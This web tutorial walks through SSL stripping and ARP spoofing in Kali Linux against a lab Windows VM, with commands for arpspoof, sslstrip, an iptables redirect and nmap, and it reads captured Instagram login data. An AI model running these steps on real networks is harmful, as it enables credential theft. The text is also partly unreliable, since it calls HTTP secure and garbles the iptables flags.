Open In App

SSL Stripping and ARP Spoofing in Kali Linux

Improve
Improve
Like Article
Like
Save
Share
Report

SSL(Secure Sockets Layer) Stripping is basically one type of action that can be performed by Cyber attackers or any intruders in a specific area of the network and it changes  HTTPS(Hyper Text Transfer Protocol Secure ) Connection to HTTP (Hyper Text Transfer Protocol) Connection. ARP (Address Resolution Protocol) Spoofing helps to establish SSL Stripping Attack against any victim which is connected to the same area of the attacker’s network such as the same Public Wi-Fi. 

Structure Diagram: 

For understanding a better way let’s see below diagram:

SSL Stripping

 

There are mainly 4 steps in this type of attack:

  1. Victim requests to the server in HTTPS but by arpspoof attacker spoofed network and the request HTTPS pass through the attacker machine.
  2.  After hijacking the HTTPS Request attackers use the same HTTPS Request to the server because many modern servers respond only in  HTTPS  mode.
  3.  When the server responds in HTTPS encrypted format attacker changes it from HTTPS  to HTTP, which is a secure connection.
  4.  For the victim, the request attacker responds in the form of HTTP and works as a man-in-the-middle.

These types of attacks can be done in public networks. A malicious user can also make their personal Wi-Fi network and when anyone gets connected to the network they perform credential theft attacks on bank accounts or any other malicious activity.

SSL Stripping and ARP Spoofing  Usage

Following are steps for performing SSL Stripping and ARP Spoofing in Kali Linux: 

Step 1:  Open the Kali Linux terminal in root mode. 

Root mode

 

Step 2: Type the following command in the terminal and hit enter to install sslstrip:

$ apt install sslstrip
Install ssl strip

 

Installation of sslstrip in our Kali Linux is done successfully.

Step 3: Type the following command in the terminal and hit enter to install dsniff: 

$ apt install dsniff
Install dsniff

 

Installation of dsniff in our Kali Linux is done successfully.

Step 4: Type the following command in the terminal and hit enter for finding out the name of the interface of the network.

$ ifconfig
Interface name

 

This will show which interface we are using. In our case interface is eth0 and IP is 10.0.2.4   

Step 5: Execute the following command in the terminal and hit enter for IP forwarding-

$ echo '1' > /proc/sys/net/ipv4/ip_forward
IP forword

 

This will make our Kali Machine a router network.

Step 6: Type the following command in the terminal and hit enter for IP table configuration:

$ iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 8080

IP table Configuration

 

This will configure our routing table and destination port 80 and it will redirect to port 8080

Step 7: Type the following command in Terminal and hit enter for finding out the gateway IP of our router.

$ route -n
Gateway IP

 

This will show our gateway IP address. In our case gateway, IP is 10.0.2.1 

Step 8: Type the following command in the terminal and hit enter for finding out targets in the network –

$ nmap -sS -O <gateway ip>/24

In our case gateway, IP is 10.0.2.1 so we will use this gateway IP for our task- 

$ nmap -sS -O 10.0.2.1/24

Nmap Scan

 

Target  Scan

 

This will scan and show all IP of the router and based on the scan result we can identify our target. In our case, we want to attack the second VM machine which is Windows so we will open  VM Windows.

Step 9:  Open up the command prompt of  VM Windows and type ipconfig and hit enter: 

$ ipconfig

This will show our VM Windows IP as well as the gateway. Here we can also verify our gateway IP address.

In our case, VM Windows IP is 10.0.2.5 

Windows IP (Target IP)

 

Step 10: Now open up a new terminal with root access in Kali Linux and type the following command and hit enter. 

This will start the arpspoof of our target machine.

$ arpspoof -i <interface> -t <target IP> -r <gateway IP>

in our case that is 

$ arpspoof -i eth0 -t 10.0.2.5 -r 10.0.2.1

ARP Spoofing

 

Now the arp spoofing is started.

Step 11: Without closing the arpspoof terminal open up a new terminal with root access and type the following command in the terminal and hit enter:

$ sslstrip -l 8080
Start SSL Stripping

 

This will start SSL stripping on the VM Windows Targeted machine.

Step 12: Now open up the targeted Windows browser and type any web page name. In our case we type https://instagram.com it will go to the login page of Instagram and we are going to enter random data and click the login button.   

This data will be captured by the sslstrip.log file in our Kali Linux system. 

Instagram log in web page

 

Step 13: Now open up a new terminal in Kali Linux with root access and type the following command in the terminal and hit enter.

$ cat sslstrip.log

this will show captured data. In this way, we can perform SSL Stripping and ARP Spoofing in our Kali Linux system.

Spoofed Output

 



Last Updated : 02 Jan, 2023
Like Article
Save Article
Previous
Next
Share your thoughts in the comments
Similar Reads